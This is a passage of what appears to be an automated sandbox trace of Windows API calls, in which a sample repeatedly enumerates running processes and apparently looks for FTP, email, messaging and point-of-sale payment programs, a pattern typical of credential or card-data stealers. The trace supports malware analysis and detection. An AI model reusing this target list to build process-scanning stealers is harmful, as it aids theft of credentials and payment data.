lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0262.564] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0262.566] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0262.568] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0262.570] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0262.573] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0262.576] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0262.578] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0262.581] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0262.584] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0262.586] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0262.589] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0262.647] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0262.650] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0262.658] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0262.661] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0262.663] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0262.666] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0262.669] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0262.674] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0262.676] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0262.679] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0262.681] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0262.683] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0262.688] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0262.690] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0262.692] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0262.694] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0262.696] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0262.699] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0262.803] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0262.805] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0262.808] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0262.814] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0262.816] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0262.819] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0262.821] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0262.823] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0262.825] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0262.829] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0262.830] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0262.832] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0262.834] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.838] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0262.839] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0262.841] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0262.843] CloseHandle (hObject=0x17b0) returned 1 [0262.843] Sleep (dwMilliseconds=0x64) [0262.970] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x9e0 [0262.981] Process32First (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.985] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0262.987] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0262.989] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.991] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0262.993] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0262.994] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0262.996] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0263.000] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0263.001] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.003] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.004] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0263.006] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.007] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.009] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.010] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.011] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.083] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.085] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.086] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0263.088] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0263.090] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0263.095] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.097] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.099] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0263.101] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0263.103] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0263.105] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.109] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0263.111] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0263.113] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.115] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0263.117] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0263.119] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0263.206] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0263.209] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0263.211] Process32Next (in: hSnapshot=0x9e0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 